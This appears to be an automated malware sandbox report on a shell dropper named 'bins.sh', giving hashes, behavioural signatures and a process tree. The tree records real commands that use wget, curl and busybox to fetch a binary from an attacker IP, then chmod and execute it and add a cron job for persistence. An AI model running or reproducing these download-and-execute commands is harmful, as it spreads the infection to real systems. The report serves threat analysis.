Analysis
max time kernel: 149s
max time network: 148s
platform: debian-9_mipsel
resource: debian9-mipsel-20240611-en
resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 09-11-2024 10:42
Static task: static1
Behavioral task: behavioral1 (Sample: bins.sh, Resource: ubuntu1804-amd64-20240611-en)
Behavioral task: behavioral2 (Sample: bins.sh, Resource: debian9-armhf-20240611-en)
Behavioral task: behavioral3 (Sample: bins.sh, Resource: debian9-mipsbe-20240611-en)
Behavioral task: behavioral4 (Sample: bins.sh, Resource: debian9-mipsel-20240611-en)
General
Target: bins.sh
Size: 10KB
MD5: dbbbfb2de892410f6016324f5c72c881
SHA1: 24f8818e5bf61c88bd7c47818ce2ab9a3de68f94
SHA256: 0de635c2e545ff9866cce84becebf513f8c7b2276e78fb2eda6f39f1d7149e49
SHA512: a1ae894484d24a377e5ad84885c8758aaced9b067f64e0591f4892716e4bd844605aed37cf7e8f67c94b89889cc18e66e63439ea7095334710c9886efa901016
SSDEEP: 192:GcUjeSO0HQTDiswV1VZcIigJS25QQQcPTYJS25QQVPTYXwJHITDiswVbcUjeSJj:1NTDiJV1VqbgycPTY3PTYA+TDiJVb
Malware Config
Signatures
Contacts a large (2168) amount of remote hosts (1 TTP)
This may indicate a network scan to discover remotely running services.

Creates a large amount of network flows (1 TTP)
This may indicate a network scan to discover remotely running services.

File and Directory Permissions Modification (1 TTP, 1 IoC)
Adversaries may modify file or directory permissions to evade defenses.
Processes: pid 731, process chmod

Executes dropped EXE (1 IoC)
Processes: ioc /tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR, pid 732, process XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR

Renames itself (1 IoC)
Processes: pid 733, process XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR

Creates/modifies Cron job (1 TTP, 1 IoC)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes: File opened for modification /var/spool/cron/crontabs/tmp.NvxzGY (process crontab)

Enumerates running processes
Discovers information about currently running processes on the system
Processes: process XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR opened /proc/<pid>/cmdline for reading, for pids 825, 906, 937, 946, 964, 73, 319, 727, 981, 1032, 779, 848, 5, 756, 773, 802, 961, 987, 8, 11, 69, 1005, 72, 925, 933, 817, 934, 941, 994, 347, 664, 740, 923, 17, 749, 896, 1004, 23, 790, 830, 809, 895, 980, 1, 148, 669, 956, 978, 1034, 21, 114, 814, 4, 847, 881, 1024, 1025, 668, 708, 880, 852, 970, 995, 1009

Writes file to tmp directory (3 IoCs)
Malware often drops required files in the /tmp directory.
Processes: File opened for modification /tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR by wget, curl and busybox
Processes (indentation shows the parent/child level of each process)
/tmp/bins.sh (cmd: /tmp/bins.sh) PID:700
  /bin/rm (cmd: /bin/rm bins.sh) PID:702
  /usr/bin/wget (cmd: wget http://87.120.84.230/bins/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR) PID:703 [Writes file to tmp directory]
  /usr/bin/curl (cmd: curl -O http://87.120.84.230/bins/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR) PID:724 [Writes file to tmp directory]
  /bin/busybox (cmd: /bin/busybox wget http://87.120.84.230/bins/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR) PID:730 [Writes file to tmp directory]
  /bin/chmod (cmd: chmod 777 XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR) PID:731 [File and Directory Permissions Modification]
  /tmp/XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR (cmd: ./XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR) PID:732 [Executes dropped EXE; Renames itself; Reads runtime system information]
    /bin/sh (cmd: sh -c "crontab -l") PID:734
      /usr/bin/crontab (cmd: crontab -l) PID:735
    /bin/sh (cmd: sh -c "crontab -") PID:736
      /usr/bin/crontab (cmd: crontab -) PID:737 [Creates/modifies Cron job]
  /bin/rm (cmd: rm XKKiKg2bxGr3Z2lqZoLFko5NtSqpJCRioR) PID:741
  /usr/bin/wget (cmd: wget http://87.120.84.230/bins/I0lFteEawbJ2WBcXsletRRgRlmO7jvdj72) PID:742
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 151KB
MD5: 6c583043d91c55aa470c08c87058e917
SHA1: abf65a5b9bba69980278ad09356e53de8bb89439
SHA256: 2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA512: 82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

Filesize: 210B
MD5: 2861b320495e2318e0843ae7d57a6110
SHA1: 0efafa3da2c1979e831af58a6b7d8bcb781df75b
SHA256: c7251c73ec9279ce977869a1ff7d3db374b5fa6e85490a6ef93c2170ee1f867d
SHA512: 681086df066a2ea4d4b29e90f650eb57f2b6313a45f138bb71e2cd0ad7271981dc4095217b1b1a21556e4985a3e60b102f4cc0c71c39bea7728b357d7c02a7c1